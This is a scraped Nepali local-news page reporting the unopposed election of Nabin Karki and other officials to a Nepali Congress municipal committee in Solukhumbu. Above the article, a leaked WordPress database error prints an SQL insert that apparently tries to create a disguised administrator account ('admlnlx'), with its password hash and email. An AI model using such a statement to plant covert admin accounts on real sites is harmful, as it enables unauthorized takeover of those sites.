WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJFaloXwPRwjycnYeWFh.ulOZe6Hg70', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 17:08:59', '', 'admlnlx', 'admlnlx')

माप्य दुधकोशी कांग्रेस सभापतिमा कार्की निर्विरोध – Gaule Khabar

माप्य दुधकोशी कांग्रेस सभापतिमा कार्की निर्विरोध

माप्य दुधकोशी कांग्रेस सभापतिमा कार्की निर्विरोध

सोलुखुम्बु । माप्य दुधकोशी गाउँपालिका सोलुखुम्बुको कांग्रेस सभापतिमा नविन कार्की निर्विरोध चयन भएका छन् ।

नेपाली कांग्रेसको १४ औँ महाधिबेशन अन्तरगत आज सम्पन्न पालिका अधिवेशनले कार्कीलाई निर्विरोध पालिका सभापतिमा चयन गरेको हो ।

समितिको उप–सभापतिमा दिनेश राई र आङकाजि शेर्पा, सचिवमा तेजनारायण मगर र अविरल तामाङ, सह–सचिवमा मिङमार शेर्पा र भिम कामी, कोषाध्यक्षमा आशवरी राई निर्विरोध चयन चयन भएका छन ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका